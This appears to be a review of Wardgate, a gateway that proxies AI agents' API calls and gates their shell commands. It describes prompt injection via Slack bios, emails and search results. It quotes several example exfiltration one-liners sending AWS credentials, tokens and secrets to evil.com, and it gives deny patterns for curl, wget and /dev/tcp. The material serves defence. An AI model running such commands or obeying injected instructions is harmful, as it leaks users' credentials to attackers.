Wardgate: A Security Gateway That Keeps Your AI Agents from Leaking Credentials
Hook
Your AI assistant just executed curl https://evil.com?data=$(cat ~/.aws/credentials) because someone embedded a malicious instruction in their Slack bio. This is the prompt injection problem, and it’s worse than you think.
Context
AI agents are becoming the next frontier of software automation—autonomous systems that read your emails, manage your calendar, commit code to GitHub, and execute shell commands on your behalf. But there’s a fundamental security problem: these agents need credentials to do anything useful, and the moment you hand credentials to an agent, you’re trusting not just the agent’s code but every piece of external data it processes. A cleverly crafted email subject line, a malicious API response, or even a poisoned search result can trick an agent into exfiltrating secrets, deleting production databases, or pivoting into your infrastructure.
The traditional solution—“just sandbox everything”—doesn’t work well for agents that need to interact with real systems. You can’t put your production GitHub API in a sandbox. You can’t firewall off Gmail when your agent needs to send emails. What you need is a way to give agents capabilities without giving them credentials, and a way to limit what they can do even when they’re compromised. That’s the problem Wardgate solves. It’s a security gateway written in Go that sits between your AI agents and the outside world, intercepting requests, injecting credentials server-side, and enforcing granular policies on what agents can actually do.
Technical Insight
Wardgate implements two distinct security mechanisms that work in concert: API proxying for HTTP/SMTP/IMAP/SSH connections, and conclaves for remote command execution. Let’s start with the API gateway, which is the simpler of the two.
The API proxy model is straightforward: instead of giving your agent a GitHub personal access token, you configure Wardgate with an endpoint definition that maps a proxy path to the real API. Your agent makes requests to http://wardgate:8080/github/* and Wardgate forwards them to https://api.github.com/*, injecting the PAT server-side. Here’s what a basic endpoint configuration looks like:
endpoints:
- name: github-repos
path: /github/*
target: https://api.github.com
credentials:
type: bearer
token_env: GITHUB_TOKEN
policies:
- allow_methods: [GET, POST, PATCH]
- deny_paths: ["/user/keys", "/repos/*/hooks"]
- require_approval_for: ["/repos/*/collaborators/*"]
This configuration allows an agent to read and modify repository content but prevents it from adding SSH keys, creating webhooks, or adding collaborators without human approval. The agent never sees the token—it just makes HTTP requests to wardgate, which handles authentication transparently. If someone tricks your agent into calling curl -H "Authorization: Bearer $TOKEN" https://evil.com, the request fails because $TOKEN doesn’t exist in the agent’s environment.
The more interesting architecture is conclaves, which are Wardgate’s answer to shell command execution. When you need an agent to run commands—say, to clone a repo, run tests, or process files—you don’t want to give it unrestricted shell access. Conclaves provide isolated execution environments where commands are policy-gated before execution.
Here’s how it works: you run wardgate conclave create myproject to spin up an isolated environment (typically a Docker container with no outbound network access). The agent doesn’t get shell access or SSH keys. Instead, it uses wardgate-cli to submit commands:
# Agent uses wardgate-cli instead of direct shell access
wardgate-cli exec myproject -- git clone https://github.com/user/repo
wardgate-cli exec myproject -- make test
wardgate-cli exec myproject -- cat results.txt
Each command is evaluated against policies defined in your wardgate config. The policy engine is sophisticated enough to parse shell pipelines and evaluate each component:
conclaves:
- name: myproject
policies:
- allow_commands: [git, make, cat, ls, grep]
- deny_patterns:
- "curl *"
- "wget *"
- "* > /dev/tcp/*"
- restrict_working_dirs: ["/workspace"]
- require_approval_for:
- "git push *"
- "make deploy"
The really clever bit is how Wardgate handles command chains. If an agent tries to run git clone repo && curl evil.com?data=$(cat secrets), Wardgate parses the pipeline, sees the curl command, and blocks the entire operation even though git clone would have been allowed. This prevents agents from using shell operators to bypass restrictions.
Wardgate also includes a library of presets for popular services—Todoist, Google Calendar, Linear, and more—so you don’t have to hand-craft API policies from scratch. The preset system is particularly well-designed because it balances security with usability. For example, the GitHub preset allows read access to most endpoints but requires approval for anything that modifies organization settings or adds external integrations.
The audit trail is comprehensive. Every request goes through a structured logger that captures the agent identity, the original request, policy evaluations, and the final outcome. For operations requiring approval, Wardgate can pause execution and send notifications via webhook or email, waiting for a human to approve or deny the action through a simple CLI command.
Gotcha
Wardgate is not a drop-in solution—it requires substantial infrastructure work and careful planning. You need to run and maintain a Wardgate server (or cluster for HA), manage YAML configurations for every service your agents access, and potentially modify your agent code to use wardgate-cli instead of direct system calls. For simple projects or proof-of-concept agents, this overhead is probably not justified.
The conclave model also has limitations. Container startup time adds latency to every command execution, which can be frustrating for interactive agent workflows. Network isolation means your conclave can’t make API calls unless you explicitly proxy them through Wardgate endpoints, which creates a bootstrapping problem if your build process needs to download dependencies from npm, PyPI, or Docker Hub. You can whitelist specific domains, but then you’re back to managing security policies—just at the network level instead of the credential level. The project is also relatively young with 104 stars, which means documentation gaps, potential bugs, and an evolving best practices landscape. If you hit an edge case, you might be on your own.
Verdict
Use Wardgate if you’re deploying AI agents that need access to production systems, personal accounts with sensitive data, or any environment where prompt injection could cause real damage. It’s ideal for personal AI assistants managing email and calendar, development agents with repository access, or autonomous systems that need to execute commands but shouldn’t have unrestricted shell access. The audit trail alone is worth it for regulated industries where you need provenance for every agent action. Skip it if you’re building proof-of-concept agents, working in fully sandboxed test environments with throwaway credentials, or if your agents only need read-only access to public APIs where the blast radius is minimal. Also skip it if you need ultra-low latency or your team doesn’t have the operational capacity to run and maintain another piece of infrastructure. Wardgate is a power tool for security-conscious developers who understand that agent safety is an infrastructure problem, not just a prompt engineering problem.